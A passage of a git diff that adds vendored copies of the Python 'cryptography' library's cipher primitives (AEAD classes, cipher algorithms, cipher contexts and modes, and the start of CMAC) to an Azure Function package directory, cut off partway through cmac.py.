a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc new file mode 100644 index 0000000..e94eba2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc new file mode 100644 index 0000000..fad689a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..21fd382 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc new file mode 100644 index 0000000..7ce24fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py new file mode 100644 index 0000000..0204ad9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py @@ -0,0 +1,361 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import os +import typing + +from cryptography import exceptions, utils +from cryptography.hazmat.backends.openssl import aead +from cryptography.hazmat.backends.openssl.backend import backend + + +class ChaCha20Poly1305: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "ChaCha20Poly1305 is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + utils._check_byteslike("key", key) + + if len(key) != 32: + raise ValueError("ChaCha20Poly1305 key must be 32 bytes.") + + self._key = key + + @classmethod + def generate_key(cls) -> bytes: + return os.urandom(32) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) != 12: + raise ValueError("Nonce must be 12 bytes") + + +class AESCCM: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes, tag_length: int = 16): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESCCM key must be 128, 192, or 256 bits.") + + self._key = key + if not isinstance(tag_length, int): + raise TypeError("tag_length must be an integer") + + if tag_length not in (4, 6, 8, 10, 12, 14, 16): + raise ValueError("Invalid tag_length") + + self._tag_length = tag_length + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "AESCCM is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + self._validate_lengths(nonce, len(data)) + return aead._encrypt( + backend, self, nonce, data, [associated_data], self._tag_length + ) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt( + backend, self, nonce, data, [associated_data], self._tag_length + ) + + def _validate_lengths(self, nonce: bytes, data_len: int) -> None: + # For information about computing this, see + # https://tools.ietf.org/html/rfc3610#section-2.1 + l_val = 15 - len(nonce) + if 2 ** (8 * l_val) < data_len: + raise ValueError("Data too long for nonce") + + def _check_params( + self, nonce: bytes, data: bytes, associated_data: bytes + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if not 7 <= len(nonce) <= 13: + raise ValueError("Nonce must be between 7 and 13 bytes") + + +class AESGCM: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESGCM key must be 128, 192, or 256 bits.") + + self._key = key + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) < 8 or len(nonce) > 128: + raise ValueError("Nonce must be between 8 and 128 bytes") + + +class AESOCB3: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESOCB3 key must be 128, 192, or 256 bits.") + + self._key = key + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "OCB3 is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) < 12 or len(nonce) > 15: + raise ValueError("Nonce must be between 12 and 15 bytes") + + +class AESSIV(object): + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (32, 48, 64): + raise ValueError("AESSIV key must be 256, 384, or 512 bits.") + + self._key = key + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "AES-SIV is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (256, 384, 512): + raise ValueError("bit_length must be 256, 384, or 512") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + data: bytes, + associated_data: typing.Optional[typing.List[bytes]], + ) -> bytes: + if associated_data is None: + associated_data = [] + + self._check_params(data, associated_data) + + if len(data) > self._MAX_SIZE or any( + len(ad) > self._MAX_SIZE for ad in associated_data + ): + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + return aead._encrypt(backend, self, b"", data, associated_data, 16) + + def decrypt( + self, + data: bytes, + associated_data: typing.Optional[typing.List[bytes]], + ) -> bytes: + if associated_data is None: + associated_data = [] + + self._check_params(data, associated_data) + + return aead._decrypt(backend, self, b"", data, associated_data, 16) + + def _check_params( + self, + data: bytes, + associated_data: typing.List, + ) -> None: + utils._check_bytes("data", data) + if not isinstance(associated_data, list) or not all( + isinstance(x, bytes) for x in associated_data + ): + raise TypeError("associated_data must be a list of bytes or None") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py new file mode 100644 index 0000000..8db40fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py @@ -0,0 +1,207 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography import utils +from cryptography.hazmat.primitives.ciphers import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) + + +def _verify_key_size(algorithm: CipherAlgorithm, key: bytes) -> bytes: + # Verify that the key is instance of bytes + utils._check_byteslike("key", key) + + # Verify that the key size matches the expected key size + if len(key) * 8 not in algorithm.key_sizes: + raise ValueError( + "Invalid key size ({}) for {}.".format( + len(key) * 8, algorithm.name + ) + ) + return key + + +class AES(CipherAlgorithm, BlockCipherAlgorithm): + name = "AES" + block_size = 128 + # 512 added to support AES-256-XTS, which uses 512-bit keys + key_sizes = frozenset([128, 192, 256, 512]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class Camellia(CipherAlgorithm, BlockCipherAlgorithm): + name = "camellia" + block_size = 128 + key_sizes = frozenset([128, 192, 256]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class TripleDES(CipherAlgorithm, BlockCipherAlgorithm): + name = "3DES" + block_size = 64 + key_sizes = frozenset([64, 128, 192]) + + def __init__(self, key: bytes): + if len(key) == 8: + key += key + key + elif len(key) == 16: + key += key[:8] + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class Blowfish(CipherAlgorithm, BlockCipherAlgorithm): + name = "Blowfish" + block_size = 64 + key_sizes = frozenset(range(32, 449, 8)) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_BlowfishInternal = Blowfish +utils.deprecated( + Blowfish, + __name__, + "Blowfish has been deprecated", + utils.DeprecatedIn37, + name="Blowfish", +) + + +class CAST5(CipherAlgorithm, BlockCipherAlgorithm): + name = "CAST5" + block_size = 64 + key_sizes = frozenset(range(40, 129, 8)) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_CAST5Internal = CAST5 +utils.deprecated( + CAST5, + __name__, + "CAST5 has been deprecated", + utils.DeprecatedIn37, + name="CAST5", +) + + +class ARC4(CipherAlgorithm): + name = "RC4" + key_sizes = frozenset([40, 56, 64, 80, 128, 160, 192, 256]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class IDEA(CipherAlgorithm, BlockCipherAlgorithm): + name = "IDEA" + block_size = 64 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_IDEAInternal = IDEA +utils.deprecated( + IDEA, + __name__, + "IDEA has been deprecated", + utils.DeprecatedIn37, + name="IDEA", +) + + +class SEED(CipherAlgorithm, BlockCipherAlgorithm): + name = "SEED" + block_size = 128 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_SEEDInternal = SEED +utils.deprecated( + SEED, + __name__, + "SEED has been deprecated", + utils.DeprecatedIn37, + name="SEED", +) + + +class ChaCha20(CipherAlgorithm): + name = "ChaCha20" + key_sizes = frozenset([256]) + + def __init__(self, key: bytes, nonce: bytes): + self.key = _verify_key_size(self, key) + utils._check_byteslike("nonce", nonce) + + if len(nonce) != 16: + raise ValueError("nonce must be 128-bits (16 bytes)") + + self._nonce = nonce + + @property + def nonce(self) -> bytes: + return self._nonce + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class SM4(CipherAlgorithm, BlockCipherAlgorithm): + name = "SM4" + block_size = 128 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py new file mode 100644 index 0000000..67af497 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py @@ -0,0 +1,269 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.exceptions import ( + AlreadyFinalized, + AlreadyUpdated, + NotYetFinalized, +) +from cryptography.hazmat.primitives._cipheralgorithm import CipherAlgorithm +from cryptography.hazmat.primitives.ciphers import modes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.ciphers import ( + _CipherContext as _BackendCipherContext, + ) + + +class CipherContext(metaclass=abc.ABCMeta): + @abc.abstractmethod + def update(self, data: bytes) -> bytes: + """ + Processes the provided bytes through the cipher and returns the results + as bytes. + """ + + @abc.abstractmethod + def update_into(self, data: bytes, buf: bytes) -> int: + """ + Processes the provided bytes and writes the resulting data into the + provided buffer. Returns the number of bytes written. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Returns the results of processing the final block as bytes. + """ + + +class AEADCipherContext(CipherContext, metaclass=abc.ABCMeta): + @abc.abstractmethod + def authenticate_additional_data(self, data: bytes) -> None: + """ + Authenticates the provided bytes. + """ + + +class AEADDecryptionContext(AEADCipherContext, metaclass=abc.ABCMeta): + @abc.abstractmethod + def finalize_with_tag(self, tag: bytes) -> bytes: + """ + Returns the results of processing the final block as bytes and allows + delayed passing of the authentication tag. + """ + + +class AEADEncryptionContext(AEADCipherContext, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tag(self) -> bytes: + """ + Returns tag bytes. This is only available after encryption is + finalized. + """ + + +Mode = typing.TypeVar( + "Mode", bound=typing.Optional[modes.Mode], covariant=True +) + + +class Cipher(typing.Generic[Mode]): + def __init__( + self, + algorithm: CipherAlgorithm, + mode: Mode, + backend: typing.Any = None, + ): + + if not isinstance(algorithm, CipherAlgorithm): + raise TypeError("Expected interface of CipherAlgorithm.") + + if mode is not None: + # mypy needs this assert to narrow the type from our generic + # type. Maybe it won't some time in the future. + assert isinstance(mode, modes.Mode) + mode.validate_for_algorithm(algorithm) + + self.algorithm = algorithm + self.mode = mode + + @typing.overload + def encryptor( + self: "Cipher[modes.ModeWithAuthenticationTag]", + ) -> AEADEncryptionContext: + ... + + @typing.overload + def encryptor( + self: "_CIPHER_TYPE", + ) -> CipherContext: + ... + + def encryptor(self): + if isinstance(self.mode, modes.ModeWithAuthenticationTag): + if self.mode.tag is not None: + raise ValueError( + "Authentication tag must be None when encrypting." + ) + from cryptography.hazmat.backends.openssl.backend import backend + + ctx = backend.create_symmetric_encryption_ctx( + self.algorithm, self.mode + ) + return self._wrap_ctx(ctx, encrypt=True) + + @typing.overload + def decryptor( + self: "Cipher[modes.ModeWithAuthenticationTag]", + ) -> AEADDecryptionContext: + ... + + @typing.overload + def decryptor( + self: "_CIPHER_TYPE", + ) -> CipherContext: + ... + + def decryptor(self): + from cryptography.hazmat.backends.openssl.backend import backend + + ctx = backend.create_symmetric_decryption_ctx( + self.algorithm, self.mode + ) + return self._wrap_ctx(ctx, encrypt=False) + + def _wrap_ctx( + self, ctx: "_BackendCipherContext", encrypt: bool + ) -> typing.Union[ + AEADEncryptionContext, AEADDecryptionContext, CipherContext + ]: + if isinstance(self.mode, modes.ModeWithAuthenticationTag): + if encrypt: + return _AEADEncryptionContext(ctx) + else: + return _AEADDecryptionContext(ctx) + else: + return _CipherContext(ctx) + + +_CIPHER_TYPE = Cipher[ + typing.Union[ + modes.ModeWithNonce, + modes.ModeWithTweak, + None, + modes.ECB, + modes.ModeWithInitializationVector, + ] +] + + +class _CipherContext(CipherContext): + _ctx: typing.Optional["_BackendCipherContext"] + + def __init__(self, ctx: "_BackendCipherContext") -> None: + self._ctx = ctx + + def update(self, data: bytes) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return self._ctx.update(data) + + def update_into(self, data: bytes, buf: bytes) -> int: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return self._ctx.update_into(data, buf) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize() + self._ctx = None + return data + + +class _AEADCipherContext(AEADCipherContext): + _ctx: typing.Optional["_BackendCipherContext"] + _tag: typing.Optional[bytes] + + def __init__(self, ctx: "_BackendCipherContext") -> None: + self._ctx = ctx + self._bytes_processed = 0 + self._aad_bytes_processed = 0 + self._tag = None + self._updated = False + + def _check_limit(self, data_size: int) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + self._updated = True + self._bytes_processed += data_size + if self._bytes_processed > self._ctx._mode._MAX_ENCRYPTED_BYTES: + raise ValueError( + "{} has a maximum encrypted byte limit of {}".format( + self._ctx._mode.name, self._ctx._mode._MAX_ENCRYPTED_BYTES + ) + ) + + def update(self, data: bytes) -> bytes: + self._check_limit(len(data)) + # mypy needs this assert even though _check_limit already checked + assert self._ctx is not None + return self._ctx.update(data) + + def update_into(self, data: bytes, buf: bytes) -> int: + self._check_limit(len(data)) + # mypy needs this assert even though _check_limit already checked + assert self._ctx is not None + return self._ctx.update_into(data, buf) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize() + self._tag = self._ctx.tag + self._ctx = None + return data + + def authenticate_additional_data(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + if self._updated: + raise AlreadyUpdated("Update has been called on this context.") + + self._aad_bytes_processed += len(data) + if self._aad_bytes_processed > self._ctx._mode._MAX_AAD_BYTES: + raise ValueError( + "{} has a maximum AAD byte limit of {}".format( + self._ctx._mode.name, self._ctx._mode._MAX_AAD_BYTES + ) + ) + + self._ctx.authenticate_additional_data(data) + + +class _AEADDecryptionContext(_AEADCipherContext, AEADDecryptionContext): + def finalize_with_tag(self, tag: bytes) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize_with_tag(tag) + self._tag = self._ctx.tag + self._ctx = None + return data + + +class _AEADEncryptionContext(_AEADCipherContext, AEADEncryptionContext): + @property + def tag(self) -> bytes: + if self._ctx is not None: + raise NotYetFinalized( + "You must finalize encryption before " "getting the tag." + ) + assert self._tag is not None + return self._tag diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py new file mode 100644 index 0000000..65a61a5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py @@ -0,0 +1,263 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives._cipheralgorithm import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) + + +class Mode(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this mode (e.g. "ECB", "CBC"). + """ + + @abc.abstractmethod + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + """ + Checks that all the necessary invariants of this (mode, algorithm) + combination are met. + """ + + +class ModeWithInitializationVector(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def initialization_vector(self) -> bytes: + """ + The value of the initialization vector for this mode as bytes. + """ + + +class ModeWithTweak(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tweak(self) -> bytes: + """ + The value of the tweak for this mode as bytes. + """ + + +class ModeWithNonce(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def nonce(self) -> bytes: + """ + The value of the nonce for this mode as bytes. + """ + + +class ModeWithAuthenticationTag(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tag(self) -> typing.Optional[bytes]: + """ + The value of the tag supplied to the constructor of this mode. + """ + + +def _check_aes_key_length(self: Mode, algorithm: CipherAlgorithm) -> None: + if algorithm.key_size > 256 and algorithm.name == "AES": + raise ValueError( + "Only 128, 192, and 256 bit keys are allowed for this AES mode" + ) + + +def _check_iv_length( + self: ModeWithInitializationVector, algorithm: BlockCipherAlgorithm +) -> None: + if len(self.initialization_vector) * 8 != algorithm.block_size: + raise ValueError( + "Invalid IV size ({}) for {}.".format( + len(self.initialization_vector), self.name + ) + ) + + +def _check_nonce_length( + nonce: bytes, name: str, algorithm: CipherAlgorithm +) -> None: + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + f"{name} requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + if len(nonce) * 8 != algorithm.block_size: + raise ValueError( + "Invalid nonce size ({}) for {}.".format(len(nonce), name) + ) + + +def _check_iv_and_key_length( + self: ModeWithInitializationVector, algorithm: CipherAlgorithm +) -> None: + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + f"{self} requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + _check_aes_key_length(self, algorithm) + _check_iv_length(self, algorithm) + + +class CBC(ModeWithInitializationVector): + name = "CBC" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class XTS(ModeWithTweak): + name = "XTS" + + def __init__(self, tweak: bytes): + utils._check_byteslike("tweak", tweak) + + if len(tweak) != 16: + raise ValueError("tweak must be 128-bits (16 bytes)") + + self._tweak = tweak + + @property + def tweak(self) -> bytes: + return self._tweak + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + if algorithm.key_size not in (256, 512): + raise ValueError( + "The XTS specification requires a 256-bit key for AES-128-XTS" + " and 512-bit key for AES-256-XTS" + ) + + +class ECB(Mode): + name = "ECB" + + validate_for_algorithm = _check_aes_key_length + + +class OFB(ModeWithInitializationVector): + name = "OFB" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CFB(ModeWithInitializationVector): + name = "CFB" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CFB8(ModeWithInitializationVector): + name = "CFB8" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CTR(ModeWithNonce): + name = "CTR" + + def __init__(self, nonce: bytes): + utils._check_byteslike("nonce", nonce) + self._nonce = nonce + + @property + def nonce(self) -> bytes: + return self._nonce + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + _check_aes_key_length(self, algorithm) + _check_nonce_length(self.nonce, self.name, algorithm) + + +class GCM(ModeWithInitializationVector, ModeWithAuthenticationTag): + name = "GCM" + _MAX_ENCRYPTED_BYTES = (2**39 - 256) // 8 + _MAX_AAD_BYTES = (2**64) // 8 + + def __init__( + self, + initialization_vector: bytes, + tag: typing.Optional[bytes] = None, + min_tag_length: int = 16, + ): + # OpenSSL 3.0.0 constrains GCM IVs to [64, 1024] bits inclusive + # This is a sane limit anyway so we'll enforce it here. + utils._check_byteslike("initialization_vector", initialization_vector) + if len(initialization_vector) < 8 or len(initialization_vector) > 128: + raise ValueError( + "initialization_vector must be between 8 and 128 bytes (64 " + "and 1024 bits)." + ) + self._initialization_vector = initialization_vector + if tag is not None: + utils._check_bytes("tag", tag) + if min_tag_length < 4: + raise ValueError("min_tag_length must be >= 4") + if len(tag) < min_tag_length: + raise ValueError( + "Authentication tag must be {} bytes or longer.".format( + min_tag_length + ) + ) + self._tag = tag + self._min_tag_length = min_tag_length + + @property + def tag(self) -> typing.Optional[bytes]: + return self._tag + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + _check_aes_key_length(self, algorithm) + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + "GCM requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + block_size_bytes = algorithm.block_size // 8 + if self._tag is not None and len(self._tag) > block_size_bytes: + raise ValueError( + "Authentication tag cannot be more than {} bytes.".format( + block_size_bytes + ) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py new file mode 100644 index 0000000..1eaa814 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py @@ -0,0 +1,66 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) +from cryptography.hazmat.primitives import ciphers + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.cmac import _CMACContext + + +class CMAC: + _ctx: typing.Optional["_CMACContext"] + _algorithm: ciphers.BlockCipherAlgorithm + + def __init__( + self, + algorithm: ciphers.BlockCipherAlgorithm, + backend: typing.Any = None, + ctx: typing.Optional["_CMACContext"] = None, + ): + if not isinstance(algorithm, ciphers.BlockCipherAlgorithm): + raise TypeError("Expected instance of BlockCipherAlgorithm.") + self._algorithm = algorithm + + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_cmac_ctx(self._algorithm) + else: + self._ctx = ctx + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_bytes("data", data) + self._ctx.update(data) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + def 